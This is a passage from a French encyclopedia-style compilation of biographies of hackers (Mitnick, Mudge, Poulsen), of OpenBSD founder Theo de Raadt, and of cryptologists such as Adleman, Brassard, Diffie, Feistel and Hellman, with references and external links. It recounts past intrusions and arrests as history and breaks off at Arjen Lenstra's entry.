Arrestation En arrivant à Raleigh, l'équipe découvre que l'origine des appels semble provenir de la compagnie téléphonique GTE. Mais en approfondissant leur recherche, ils trouvent qu'ils émanent de la compagnie Sprint. L'équipe s'installe alors dans la pièce du commutateur téléphonique central de Sprint pour localiser physiquement le téléphone cellulaire de Mitnick. Mais, Mitnick a modifié les logiciels du réseau et Sprint croyait que les appels provenaient de GTE. Le numéro du correspondant étant cependant identifié, Shimomura décide de parcourir pendant deux jours les rues de Raleigh avec une antenne de détection, utilisant un appareil permettant d'espionner les communication cellulaires, un Cellscope 2000[11]. Il finit par localiser l'appartement de Mitnick. Le 15 février 1995 à 2 heures du matin, le FBI et Shimomura investissent la chambre de Mitnick et procèdent à son arrestation. Le journaliste John Markoff, ami de Shimomura, était également sur les lieux. Ils publieront un livre racontant la poursuite[12]. Selon une anecdote, Mitnick se serait alors exclamé : « Salut Tsutomu ! Félicitations ! »

Procès Mitnick a plaidé coupable pour sept chefs d'accusation (intrusion de systèmes et vols de logiciels protégés, entre autres) envers les sociétés Motorola, Fujitsu et Sun Microsystems. Mais il a contesté la manière artificielle dont l'accusation a chiffré le manque à gagner de ces sociétés. Le procureur réclame finalement 1,5 million de dollars en dédommagement et de 5 à 10 millions de dollars de frais de procédures. Mitnick fut condamné à cinq ans de prison. Ce fut à l'époque la peine la plus lourde infligée à quelqu'un pour délit informatique.

Anecdotes Son arrestation a conduit à une vague de cyber manifestations orchestrées par le site anglais Free Kevin Mitnick. Le FBI disait de lui que le profit n'était pas sa motivation, ce qui le rendait d'autant plus dangereux. Le 17 février 2013, Kevin Mitmick devient, le temps d'une journée, le gardien de l'élection présidentielle en Équateur[13].

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Kevin_Mitnick& action=edit [2] Kevin Mitnick & William Simon (avec une préface de Steve Wozniak), L'art de la supercherie : Les révélations du plus célèbre hacker de la planète, 2002, ISBN 0471432288 [3] Kevin Mitnick & William Simon, L'art de l'intrusion : Les plus fabuleux exploits des pirates informatiques, 2005, ISBN 2744019534 [4][4]Mitnick, un personnage haut en couleurs

[5] Biographie Rotten.com (http:/ / www. rotten. com/ library/ bio/ hackers/ kevin-mitnick/ )

[6] Article de Tom's Guide : " Les geeks les plus célèbres de l'histoire", page 8 (http:/ / www. infos-du-net. com/ actualite/ dossiers/

149-8-histoire-geeks-celebres. html) [7] John Markoff et Katie Hafner, Cyberpunk: Outlaws and Hackers on the Computer Frontier, 1991,ISBN 0684818620.

[8] http:/ / interviews. slashdot. org/ article. pl?sid=03/ 02/ 04/ 2233250, première question [9][9]Comment Mitnick a gaché le Noël de Tsutomu [10][10]Comment Tsutomu a retrouvé Mitnick

[11] Kevin Mitnick Answers (http:/ / interviews. slashdot. org/ article. pl?sid=03/ 02/ 04/ 2233250) - Interview sur Slashdot [12] Tsutomu Shimomura et John Markoff, Takedown: The Pursuit and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw - By the Man Who Did It, 1998,ISBN 0786889136

[13] (http:/ / www. liberation. fr/ monde/ 2013/ 02/ 16/ exclusif-afp-un-ancien-hacker-comme-gardien-des-elections-en-equateur_882363) Kevin Mitnick 368

Bibliographie • (en) Tsutomu Shimomura et John Markoff, Takedown : The Pursuit and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw - By the Man Who Did It, 1998. (ISBN 0786889136) • (en) Jonathan Littman, The Fugitive Game : Online with Kevin Mitnick. (ISBN 0316528587) • (en) Katie Hafner et John Markoff, Cyberpunk : Outlaws and Hackers on the Computer Frontier, 1991. (ISBN 0684818620) • (en) Kevin Mitnick, Ghost in the Wires: My Adventures as the World's Most Wanted Hacker, 2011. (ISBN 0316037702)

Filmographie • Cybertraque (Takedown) retrace la vie de Kevin Mitnick et comment Tsutomu Shimomura a aidé le FBI à le retrouver.

Annexes

Articles connexes •• Attaque de Mitnick •• Hacking For Girliez •• Kevin Poulsen

Liens externes

• (en) Chapitre 1 du livre de Kevin Mitnick (http:/ / www. theregister. co. uk/ content/ 55/ 28835. html) • (en) Site officiel de Defensive thinking, la société de consultation en sécurité informatique de Kevin Mitnick

(http:/ / www. kevinmitnick. com)

• (en) Retrace la traque de Mitnick. (http:/ / www. takedown. com)

• (fr) Les geeks des plus célèbres de l'histoire, page 8 (http:/ / www. infos-du-net. com/ actualite/ dossiers/

149-8-histoire-geeks-celebres. html)

• Portail de la sécurité informatique • Portail de la sécurité de l’information Mudge (hacker) 369 Mudge (hacker)

Pour les articles homonymes, voir Mudge. Mudge, de son vrai nom Peiter Zatko, est l'ancien directeur général et chercheur en chef de L0pht Heavy Industries, un fameux groupe de hackers spécialiste en sécurité informatique.

Présentation Mudge était le vice-président du département de recherche et développement, avec les autres membres du L0pht, de la compagnie @stake, Inc. (compagnie américaine en sécurité informatique située à Cambridge, Massachusetts racheté par Symantec en 2004). Il est également membre du groupe Cult of the Dead Cow depuis 1996. Mudge est considéré comme l'un des chefs de file de la mouvance grey hat américaine. Mudge a été l'un des premiers à avoir écrit un article sur les attaques par dépassement de tampon. Il est également l'auteur du logiciel d'audit de mots de passe L0phtCrack pour les systèmes d'exploitation Windows et a participé à l'élaboration d'Antisniff, le premier outil de détection à distance des machines en mode promiscuité. Il est aussi un spécialiste en cryptanalyse et a notamment copublié avec Bruce Schneier quelques articles de référence. Il était de même un intervenant lors de rassemblements de hackers comme le Black Hat Briefings ou DEF CON. Mudge fut l'un des tout premiers hackers à avoir coopéré et entretenu des relations approfondies avec les instances gouvernementales américaines. Il a été un consultant du comité sénatorial américain pour analyser les menaces électroniques qui pèsent sur la sécurité des États-Unis et faisait partie des membres du Cult of the Dead Cow qui ont témoigné devant le sénat américan en 1998 qu'ils pouvaient mettre hors service le réseau Internet en l'espace de 30 min. Il a également dispensé des cycles de formation à plusieurs agences gouvernementales comme la NASA et l'US Air Force. Il a aussi participé au sommet organisé par Bill Clinton en 2000 afin de mettre en place une stratégie de formation pour améliorer la sécurité informatique.

Annexes

Références

Lien externe

• (en) "How to write a buffer overflow ", by Mudge from Lopht (1995) (http:/ / www. insecure. org/ stf/

mudge_buffer_overflow_tutorial. html)

• Portail de la sécurité informatique Kevin Poulsen 370 Kevin Poulsen

Pour les articles homonymes, voir Poulsen. Kevin Lee Poulsen, né en 1965 à Pasadena en Californie, est un ancien phreaker et hacker américain célèbre connu sous le pseudonyme Dark Dante. Il fut le premier hacker à être accusé d'espionnage aux États-Unis. Il s'est depuis reconverti dans le journalisme. Il a notamment écrit des articles portant sur la sécurité informatique pour le journal en ligne SecurityFocus[1] dont la plupart ont été repris par les médias traditionnels. Il a quitté SecurityFocus en 2005 et est actuellement De gauche à droite : Adrian Lamo, Kevin rédacteur en chef du journal en ligne Wired News. Il est également Mitnick, Kevin Poulsen embauché par le gouvernement américain pour la lutte contre les pédophiles sévissant sur Internet.

L'histoire

Les délits Le premier acte d'intrusion connue de Kevin Poulsen remonte à 1983 quand il avait 17 ans. À l'époque, ses parents lui avaient acheté un TRS-80 avec lequel il va s'introduire avec un hacker plus âgé dans le réseau ARPAnet (l'ancêtre d'Internet) de l'Université de Californie (UCLA). Probablement en raison de son jeune âge, il ne sera pas inculpé. En 1985, il est embauché comme programmeur par SRI International et Sun Microsystems et en tant que consultant en sécurité informatique du Pentagone. Ce qui ne l'empêchera pas de mener en parallèle des activités illégales. En 1987, quand il travaillait chez Sun Microsystems, il était entré en possession d'une bande magnétique contenant un document classé secret défense détaillant le plan de vols d'un exercice militaire dénommé CPX Caber Dragon impliquant des centaines de parachutistes et se déroulant à Fort Bragg, en Caroline du Nord. Il s'était également introduit dans un réseau dénommé MASnet appartenant à l'armée de terre[2]. Poulsen possédait des connaissances avancées en crochetage de serrures[3]. Il les utilisera notamment pour pénétrer par effraction dans les centraux téléphoniques de la compagnie téléphonique Pacific Bell. Il y a dérobé des commutateurs et d'autres équipements ainsi que des codes d'accès qui lui permettaient de mettre sur écoute les membres de l'équipe de sécurité de la compagnie chargés de le traquer. Il s'empara également de numéros téléphoniques non-publiés appartenant au Consulat soviétique de San Francisco.

L'arrestation Kevin Poulsen a été arrêté une première fois en 1989. N'ayant pas réglé les frais qu'il devait à un service de stockage d'Atherton, en Californie, le propriétaire décide alors de faire sauter la serrure de son casier. Il y découvre une quantité extraordinaire d'outils et d'équipements se rapportant à la téléphonie et prévient les autorités. Poulsen sera confondu avec deux de ses complices, Mark Lottor et Robert Gilligan, à cause d'une photo prise en souvenir par un de ses amis le montrant en train de crocheter la serrure d'un central téléphonique de Pacific Bell. Mais avant sa comparution devant le juge, Poulsen s'enfuit. Il est à la fois traqué par le FBI et les agents d'investigation de Pacific Bell. C'est pendant cette cavale, qui va durer 17 mois, qu'il va réaliser son plus célèbre hack. Une station de radio de Los Angeles, KIIS-FM, lance un concours radiophonique dans lequel le 102e auditeur qui appelle gagne une Porsche. Poulsen va alors prendre le contrôle de toutes les lignes téléphoniques de la station et s'arrange pour être le 102e appelant. Il remporte ainsi le prix. Kevin Poulsen 371

Poulsen sera arrêté grâce à l'émission télévisée Unsolved Mysteries[4]. Quand l'émission a traité de l'affaire Poulsen, les lignes téléphoniques sur numéro vert de l'émission étaient mystérieusement tombées en panne, rendant les éventuels téléspectateurs ayant des informations dans l'impossibilité de contacter la chaîne. Mais quelqu'un a informé les agents d'investigation de Pacific Bell que Poulsen faisait ses courses dans un supermarché de banlieue de Los Angeles. Il sera arrêté par le FBI en avril 1991.

Le procès À cause de l'ajournement de son procès, Poulsen a passé vingt mois à la prison de San José avant de comparaître devant le juge, la libération sous caution lui ayant été refusée. L'événement est sans précédent car c'est la première fois qu'un hacker est accusé d'espionnage devant une cour fédérale américaine. Le fait que l'accusé n'a jamais eu de contact avec une quelconque puissance étrangère ajoute une certaine incongruité à l'accusation. Mais en utilisant ce statut, les procureurs espéraient surtout une peine exemplaire. Poulsen fut chargé de treize chefs d'accusations dont voici les plus importants : •• entrave à la justice par délit de fuite, • intrusion dans une machine de la compagnie Pacific Bell et appropriation d'une liste non publique de numéros de téléphones et des employés au Consulat Soviétique de San Francisco, • vol de commutateurs et d'autres équipements appartenant à la même compagnie, •• recherche de données concernant l'équipe de sécurité de la compagnie et appropriation de données contenant leurs appels pour savoir s'ils étaient en train de le traquer, •• mise sur écoute et surveillance des courriers électroniques des enquêteurs de la compagnie, • intrusion dans un réseau militaire dénommé MASnet, • obtention d'un dossier classé secret défense contenant les plans de vol d'un exercice militaire dont le nom de code est CPX Caber Dragon. En juin 1994, Poulsen plaida coupable pour sept chefs d'accusations. Il fut condamné à une peine de cinquante et un mois (4 ans) de prison ferme et dut verser à Pacific Bell la somme de 56 000 USD à titre de dédommagements. Ce fut à l'époque la peine la plus lourde infligée à quelqu'un pour des affaires portant sur des délits informatiques.

Controverses Au-delà du traditionnel battage médiatique concernant ce genre d'affaire, le cas Poulsen a amené les libertariens à se poser certaines questions. L'accusation d'espionnage semble en effet exagérée, vu que l'accusé n'a jamais travaillé pour le compte d'une quelconque puissance étrangère et que les dossiers classés secret-défense avaient déjà été déclassifiés quand ils étaient entrés en sa possession. Il apparaît plutôt que toutes ses intrusions ont été effectuées à titre personnel. Le cas Poulsen a surtout montré un revirement d'opinion vis-à-vis du hacking au début des années 1990. Désormais, les délits informatiques sont considérés au même titre que tous les autres délits, si ce n'est plus avec la popularité grandissante d'Internet. Si autrefois, les hackers qui s'introduisaient illégalement dans un réseau pouvaient revendiquer la simple curiosité pour expliquer leurs actions, désormais ils sont considérés comme des criminels, même s'ils se disent sans volonté de nuire. Kevin Poulsen 372

Notes et références

[1] Journal en ligne traitant de la sécurité informatique et des failles de sécurités. Racheté par Symantec en 2002 : Securityfocus. [2] Les agents du FBI ont découvert sur la machine utilisée par Poulsen une bannière indiquant qu'il s'est effectivement connecté sur le réseau de l'armée. Mais l'avocat de Poulsen soutenait qu'il s'est arrêté après avoir reçu des avertissements sur l'usage illégal du réseau, donc qu'il s'est uniquement connecté et qu'il n'y avait pas intrusion. [3] Pour les hackers de la "vieille école", le crochetage de serrure ( lock picking en anglais) fait également partie intégrante des connaissances de base. [4] Émission traitant à la fois des affaires criminelles réelles, des amours perdus de vue, d'histoires non résolues et de paranormal dans laquelle les téléspecateurs peuvent appeler pour donner des renseignements.

Bibliographie • (en) The Watchman: The Twisted Life and Crimes of Serial-Hacker Kevin Poulsen, by Jonathan Littman, (ISBN 0316528579).

Articles connexes •• John Draper •• Kevin Mitnick

Liens externes

• (en) Site de Kevin Poulsen (http:/ / www. kevinpoulsen. com/ )

• (en) Compilation d'articles parlant de l'affaire Poulsen, parus dans le numéro 41 de phrack (http:/ / www. phrack.

org/ issues. html?issue=41& id=12#article)

• Portail de la sécurité informatique • Portail de la sécurité de l’information Theo de Raadt 373 Theo de Raadt

Pour les articles homonymes, voir Theo. Theo de raadt

Theo de raadt

Données clés

Naissance 19 mai 1968 Pretoria ( Afrique du Sud)

Nationalité Canada

Diplôme Université de Calgary

Theo de Raadt (à prononcer « de raat » [də raːt] avec un long a) né le 19 mai 1968 à Pretoria (Afrique du Sud), est un ingénieur en informatique vivant à Calgary, au Canada. Il est le créateur et le chef des projets OpenBSD, OpenSSH, OpenNTPD et OpenBGPD. Il a également participé à la création du projet NetBSD. Theo de Raadt est connu pour ses positions franches et sans compromis. Les autres membres du core team de NetBSD ont d'ailleurs jugé que sa rudesse et les mauvais traitements qu'il infligeait aux utilisateurs et autres membres du projet étaient incompatibles avec le rôle de membre officiel qu'il occupait alors. C'est suite à son exclusion du conseil d'administration qu'il a fondé le projet OpenBSD en 1994[1].

Opposition à la guerre en Irak Après que Theo de Raadt eut affirmé, dans une interview donnée au Globe and Mail de Toronto, qu'il désapprouvait l'occupation de l'Irak par les États-Unis, la subvention de plusieurs millions de dollars que le Département Américain de la Défense accordait à l'Université de Pennsylvanie pour le projet POSSE a été annulée, provoquant l'arrêt du projet. Cette subvention était utilisée pour financer le développement d'OpenBSD et OpenSSH, ainsi que de nombreux autres projets, et était prévue pour le financement du hackathon prévu le 8 mai 2003. Bien que l'argent avait déjà été versé pour réserver la logistique nécessaire à la semaine des 60 développeurs présents à l'événement, le gouvernement a réclamé le remboursement des sommes, tandis que les hôtels ont été informés qu'ils ne devaient pas accepter les paiements des développeurs pour re-réserver les chambres [2]. Cette affaire a levé de nombreuses critiques, en particulier sur l'attitude de l'armée américaine, contraire à la liberté d'expression. La coupure de la subvention ne fut toutefois pas le coup de grâce que certains annonçaient. Les partisans du projet se sont mobilisés pour apporter leur aide et le hackaton se déroula à peu près comme prévu. Le financement ne s'est arrêté que quelques mois avant la fin de la subvention, ce qui a nourri les spéculations sur la Theo de Raadt 374

situation entourant la fin effective de la subvention.

Plaidoyer pour des pilotes libres Theo de Raadt est aussi connu pour son action pour les pilotes libres. Il a longtemps été très critique envers les développeurs de Linux et des autres systèmes libres pour leur tolérance vis-à-vis des pilotes non libres et de la signature d'accords de non divulgation. En particulier, Theo de Raadt a beaucoup fait pour convaincre les vendeurs de matériel IEEE 802.11 que les firmwares de leurs produits doivent être librement distribuables. Ses efforts ont bien souvent été couronnés de succès, notamment avec les compagnies taïwanaises, ce qui a permis de créer de nombreux pilotes. Aujourd'hui, Theo encourage les utilisateurs de matériel sans fil à « acheter taïwanais », en raison des réticences des industriels américains comme Intel à fournir leurs firmwares libres de toute restriction due à des licences. Pour cette action, Theo de Raadt a été récompensé par la FSF en 2004, par le Prix pour le développement du logiciel libre.

Références

[1] http:/ / mail-index. netbsd. org/ netbsd-users/ 1994/ 12/ 23/ 0000. html

[2] http:/ / lwn. net/ Articles/ 29186/ 375

13.2-Cryptologues

Leonard Adleman

Leonard Max Adleman

Leonard Adleman

Données clés

Naissance 31 décembre 1945

Nationalité États-Unis

Profession chercheur en informatique théorique et professeur en informatique et en biologie moléculaire à l’université de la Californie du Sud

Formation doctorat en 1976 à Université de Californie à Berkeley

Distinctions Prix Turing en 2002 avec Ron Rivest et Adi Shamir

Famille trois filles : Jennifer (née en 1980), Stephanie (née en 1984) et Lindsey (née en 1987)

Leonard Max Adleman (né le 31 décembre 1945), chercheur en informatique théorique et professeur en informatique et en biologie moléculaire à l’université de la Californie du Sud. Co-inventeur du cryptosystème RSA (Rivest, Shamir, Adleman) en 1977, Adleman a également travaillé dans la bio-informatique. Leonard Adleman 376

Biographie Né en Californie, Adleman grandit à San Francisco et étudie à l'Université de Californie à Berkeley. Il décroche un doctorat en 1976. En 1994, son article Molecular Computation of Solutions To Combinatorial Problems décrit l'utilisation expérimentale de l'ADN dans les systèmes informatiques. Il donne comme exemple un problème de recherche d'un chemin hamiltonien dans un graphe à 7 sommets, un problème semblable à celui du voyageur de commerce. Même si la solution est connue depuis longtemps, c’est la première fois que l’on démontre que l’ADN peut effectuer des calculs complexes. Pour sa contribution en cryptographie avec le RSA, Adleman a reçu en 2002 avec Ron Rivest et Adi Shamir le prix Turing, l’équivalent du prix Nobel en informatique. On attribue aussi à Adleman le terme de virus informatique[1]. Adleman a également officié comme consultant en mathématiques pour le film Les Experts (Sneakers)[2]. Il a trois filles : Jennifer (née en 1980), Stephanie (née en 1984) et Lindsey (née en 1987).

Annexes

Références

[1] Fred Cohen, Experiments with Computer Viruses, 1984)

Liens externes

• (en) Page de Leonard Adleman (http:/ / www. usc. edu/ dept/ molecular-science/ fm-adleman. htm)

• (en) Turing Award Citation (http:/ / www. acm. org/ awards/ turing_citations/ rivest-shamir-adleman. html)

• (en) Publications (http:/ / www. informatik. uni-trier. de/ ~ley/ db/ indices/ a-tree/ a/ Adleman:Leonard_M=. html) de Leonard M. Adleman sur DBLP

• (en) Publications (http:/ / en. scientificcommons. org/ leonard_m_adleman) de Leonard M. Adleman sur ScientificCommons

• Portail de la cryptologie • Portail de la sécurité informatique Charles H. Bennett 377 Charles H. Bennett

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Pour les articles homonymes, voir Bennett et Charles H. Bennett (soldat). Charles Henry Bennett (1943 - ) est un physicien et cryptologue américain qui travaille dans les laboratoires de recherche d'IBM Research. Les travaux récents de Bennett chez IBM ont consisté en un réexamen des bases physiques de l'information et l'application de la physique quantique aux problèmes des flux d'informations. Ses travaux ont joué un rôle majeur dans le développement d'une interconnexion entre la physique et l'information. Il a également travaillé sur un projet de cryptographie quantique à l'Université de Montréal avec Gilles Brassard. Il est le créateur du concept dit de profondeur de Bennett (ou profondeur logique de Bennett) en logique informatique.

• Portail de la cryptologie • Portail de la sécurité informatique • Portail des États-Unis Gilles Brassard

Gilles Brassard (né en 1955 à Montréal (Québec, Canada)) est un cryptologue canadien. Il a notamment aidé à jeter les bases de la cryptographie quantique.

Biographie Dès son plus jeune âge, il est passionné par les mathématiques, passion qu'il a reçue de son grand frère, Robert Brassard, qui prenait plaisir à lui enseigner des concepts avancés de mathématiques. À l’âge de 13 ans, il entre à l'Université de Montréal où il étudie l’informatique et obtient un baccalauréat en 1972 et une maîtrise en 1975. Il poursuit ses études à l'Université Cornell où la lecture d’un article sur la cryptographie le passionne et l’incite à rediriger ses études de PhD vers ce domaine. Il obtient son PhD en cryptographie en 1979, sous la supervision de John Hopcroft. Il est professeur au DIRO, le département d'informatique et de recherche opérationnelle de l'Université de Montréal, depuis lors, et est professeur titulaire depuis 1988. Ses travaux les plus connus portent sur les fondements de la cryptographie quantique, la téléportation quantique, la distillation de l'intrication quantique, la pseudotélépathie et la simulation classique de l'intrication quantique. Certains de ces concepts sont toujours théoriques, mais quelques-uns ont été appliqués en laboratoire. En 1984, avec Charles H. Bennett, Brassard invente le protocole BB84, un protocole de cryptographie quantique. Plus tard, il a davantage contribué au sujet en y incluant le protocole de correction d'erreurs par cascade, ce qui détecte et corrige efficacement le bruit causé par un observateur externe (eavesdropper) d'un signal cryptographique quantique. En 1993, avec d’autres chercheurs, il jette les bases de la téléportation quantique et parvient à téléporter des photons sur une courte distance. Le journal scientifique Science considérait alors qu’il s’agissait d’une des plus importantes découvertes de l’année. Il est le père de deux filles, Alice et Léonore. Gilles Brassard 378

Anecdote Son nombre d'Erdős est de 2, puisqu'il a écrit un article avec Carl Pomerance.

Distinctions • Récipiendaire de la Médaille d’or Herzberg du CRSNG 2009. •• IACR Distinguished Lecturer, 2008. •• OCTAS de la Personnalité de l'année en TI au Québec, FiQ, 2007. •• Prix d'excellence du CRSNG, 2006. •• Fellow, International Association for Cryptologic Research (IACR), 2006. •• Rank Prize en opto-électronique, 2006. •• Fellow, Institut canadien de recherche avancée (ICRA), 2002. •• ISI Highly Cited Researcher, Thomson Scientific. •• Chaire de recherche du Canada, 2001. •• Prix Marie-Victorin, 2000. •• Membre étranger de l'Académie des sciences de Lettonie, 1998. •• Bourse de recherche Killam, 1997. •• Membre de l'Académie des sciences, Société royale du Canada, 1996. •• Personnalité de l'année en sciences et technologie, La Presse, 1995. •• Prix Steacie, 1994. •• Prix de l'enseignement de l'Université de Montréal, 1993. • “Grand Débrouillard”, Les Débrouillards, mai 1993. •• Prix Urgel-Archambault, 1992. •• Bourse commémorative E.W.R. Steacie, 1992. Don Coppersmith 379 Don Coppersmith

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Don Coppersmith est un mathématicien et cryptologue américain. De 1968 à 1971, Coppersmith participe à la Putnam Mathematical Competition --- célèbre compétition universitaire aux États-Unis et au Canada --- et arrive systématiquement dans les cinq premiers. En 1972, il obtient un bachelor en mathématiques au Massachusetts Institute of Technology, suivi d'un master en 1975 et d'un doctorat en mathématiques à l'université Harvard en 1977. Il participe à la conception du standard de chiffrement DES, un algorithme symétrique développé au sein d'IBM et supervisé par la NSA. Il révèle peu après la découverte de la cryptanalyse différentielle au début des années 1990 qu'une méthode similaire était déjà connue des concepteurs du DES dès l'année 1974 []. Hormis cette participation à la conception du DES, on doit à Coppersmith de nombreux autres travaux : en cryptographie symétrique, ainsi il est entre autres un des concepteurs de MARS, algorithme symétrique finaliste de la compétition pour le standard AES; en cryptographie asymétrique, avec par exemple des attaques sur le RSA lorsque l'exposant de chiffrement est trop petit [1]; et de manière plus générale des algorithmes rapides, multiplication matricielle rapide, factorisation [2], logarithme discret [], ainsi que sur des problèmes d'optimisation. Il a longtemps travaillé chez IBM dans le département de mathématiques. Coppersmith a été nommé au rang de fellow par l'IACR en 2004 et en 1993 par l'IEEE.

Références

Liens

• Liste de publications (http:/ / www. informatik. uni-trier. de/ ~ley/ db/ indices/ a-tree/ c/ Coppersmith:Don. html)

• Portail des mathématiques • Portail de la cryptologie • Portail de la sécurité informatique • Portail des États-Unis Whitfield Diffie 380 Whitfield Diffie

Bailey Whitfield 'Whit' Diffie (né le 5 juin 1944) est un cryptologue américain. Il est l'un des pionniers de la cryptographie asymétrique (utilisation d'une paire de clés publique et privée) en collaboration avec Martin Hellman et Ralph Merkle.

Biographie

En 1965, il reçoit un Bachelor en mathématiques au Massachusetts Institute of Technology. En 1976 avec l'aide de Martin Hellman, il publie New Directions in Cryptography. La méthode révolutionnaire décrite dans cet article permet de résoudre un problème fondamental en cryptographie : la distribution des clés. Cette méthode sera par la suite renommée en méthode d'échange de clés Diffie-Hellman. Ce principe est aussi à l'origine de méthodes à clés asymétriques plus évoluées comme le RSA ou ElGamal

Diffie continua ses recherches au sein de Northern Telecom (Nortel) où Whitfield Diffie il s'occupa de l'architecture du système de sécurité PDSO pour les réseaux X.25. En 1991, il rejoint Sun Microsystems en Californie où il continue à s'occuper des problèmes de sécurité et de cryptographie. En 1992, il est fait docteur honoris causa de l'École polytechnique fédérale de Zurich. Il est aussi membre de la fondation Marconi. En 1998, il a écrit avec Susan Laudau un livre Privacy on the Line sur les écoutes téléphoniques et les enjeux politiques liés à la cryptographie.

Liens externes • (en) Dr. Whitfield Diffie [1]; Sun Microsystems; • (en) Biographie dans Wired Magazine [2]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / research. sun. com/ people/ diffie/

[2] http:/ / www. wired. com/ wired/ archive/ 2. 11/ diffie. html?pg=1& topic= Hans Dobbertin 381 Hans Dobbertin

Cet article est une ébauche concernant la sécurité informatique et la cryptologie. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Hans Dobbertin, (né le 17 avril 1952 et mort le 2 février 2006) était un cryptologue allemand à l'origine de la meilleure cryptanalyse sur la fonction de hachage cryptographique MD4. Membre du service du chiffre allemand (Bundesamt für Sicherheit in der Informationstechnik), Dobbertin fut professeur à l'Université de la Ruhr à Bochum. En 1996 et 1998, il publie deux articles concernant MD4 où il met en avant des attaques sur les préimages avec lesquelles il est possible de générer un message qui produit la même empreinte qu'un autre. Il a par la suite émis des doutes quant à la fiabilité de MD5, vulnérabilité confirmée par l'attaque de Xiaoyun Wang et son équipe en 2004. Dobbertin a également participé à la conception de la famille de hachage RIPEMD avec Antoon Bosselaers et Bart Preneel.

Liens externes • (de) Lehrstuhl für Kryptologie und IT-Sicherheit, Ruhr-Universität Bochum [1] • (de) Annonce de son décès [2]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www. cits. ruhr-uni-bochum. de/

[2] http:/ / www. pm. rub. de/ pm2006/ msg00045. htm Taher Elgamal 382 Taher Elgamal parfois écrit El Gamal ou ; ﻃﺎﻫﺮ ﺍﻟﺠﻤﻞ ,Taher Elgamal (en arabe ElGamal, mais Elgamal est l'orthographe désormais utilisée par l'intéressé), né le 18 août 1955 au Caire, est un cryptographe égyptien.Il est l'auteur éponyme d'un algorithme de cryptographie à clef publique qui est devenu la base du système DSA standardisé par le NIST.

Biographie

Taher Elgamal naît en 1955 en Égypte. Il obtient un bachelor of science de l'université du Caire en 1981, puis un master of science et enfin un doctorat de l'université Stanford. En 1985, il publie un article intitulé un cryptosystème à clef publique et un schéma de signature basé sur les logarithmes discrets connu désormais sous le nom d'algorithme ElGamal. De 1995 à 1998, il est directeur scientifique chez Netscape Communications où il devient l'un des principaux promoteurs de SSL. Il est aussi directeur de l'ingénierie chez RSA Security Inc. avant de fonder Securify en 1998 dont il devient le PDG. Taher Elgamal (2010) Il devient président du groupe d'information sur la sécurité de Kroll-O'Gara quand celui-ci acquiert Securify. Lorsque Securify redevient indépendant, Taher Elgamal en devient le directeur technique et membre du directoire.

• Portail de la cryptologie • Portail de la sécurité informatique Horst Feistel 383 Horst Feistel

Horst Feistel, né le 30 janvier 1915 à Berlin, mort le 14 novembre 1990, était un cryptographe américain d'origine allemande. Feistel fut l'un des premiers cryptographes universitaires. Il est l'inventeur du réseau de Feistel utilisé dans son algorithme Lucifer et introduit plus tard dans DES et bien d'autres algorithmes de chiffrement symétrique par bloc. Il est aussi à l'origine du terme d'effet avalanche, une propriété importante en cryptographie.

Biographie En 1934, Feistel émigre aux États-Unis. Au début de la guerre, il est mis aux arrêts mais le 31 janvier 1944, il devient un citoyen américain. Il est immédiatement incorporé au sein du centre US Air Force Cambridge Research Center dans la section des appareils identification des amis ou ennemis. Jusqu'en 1950, il travaille dans ce domaine. Il rejoint plus tard le Massachusetts Institute of Technology, la Mitre Corporation et finalement IBM où il reçoit une récompense pour ses avancées en cryptologie. Il obtient un Master en physique à Harvard. En 1945, il se marie avec Léona (1924-1990) avec qui il aura une fille, Peggy Feistel qui habite actuellement dans la région de Chicago.

Articles connexes •• Lucifer •• Réseau de Feistel

• Portail de la cryptologie • Portail de la sécurité informatique Martin Hellman

Pour les articles homonymes, voir Hellman. Martin E. Hellman (2 octobre, 1945 - ) est un cryptologue américain. Il est l'inventeur de la cryptographie asymétrique (utilisation d'une paire de clés publique et privée), découverte faite en collaboration avec Ralph Merkle et Whitfield Diffie. Hellman est aussi à l'origine d'une attaque avec compromis temps-mémoire notamment utilisée pour trouver des mots de passe. Cette technique a par la suite été améliorée par Philippe Oechslin.

En 1966, Martin Hellman obtient un bachelor à l'Université de New York, suivi d'un master à l'université Stanford en 1967 et un doctorat en 1969. De 1968 à 1969, il travaille chez IBM où il rencontre un autre cryptologue très connu, Horst Feistel. De 1969 à 1971, il est professeur assistant au Massachusetts Institute of Technology. En 1971, il retourne à Stanford pour poursuivre ses recherches. Martin Hellman Il est actuellement à la retraite. Martin Hellman 384

Liens externes • (en) Martin Hellman (Stanford) [1] • (en) Publications [2]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www-ee. stanford. edu/ ~hellman/

[2] http:/ / www. informatik. uni-trier. de/ ~ley/ db/ indices/ a-tree/ h/ Hellman:Martin_E=. html

Xuejia Lai

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Xuejia Lai, cryptologue, informaticien et mathématicien chinois. Il est diplômé en mathématiques, titre obtenu à l'Université de Xidian, Chine. Docteur en Technical Science à l'EPFZ, Zurich (Suisse) en 1992. Co-inventeur avec James Massey de l'algorithme symétrique IDEA, chiffrement qui utilise une construction dite de Lai-Massey. Lai a également introduit le concept de chiffrement de Markov qui permet de décrire la cryptanalyse différentielle avec une chaîne de Markov finie. Il a contribué à plusieurs standards et spécifications en cryptologie. Xuejia Lai a fait partie de l'équipe chinoise (Xiaoyun Wang et al.) qui a cassé la fonction de hachage cryptographique MD5 en 2004.

Liens externes • (en) Page personnelle [1]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / cis. sjtu. edu. cn/ personal/ laixuejia/ lai. html Arjen Lenstra 385 Arjen Lenstra

Arjen K. Lenstra, né le 2 mars 1956 à Groningue, est un cryptologue néerlandais.

Biographie

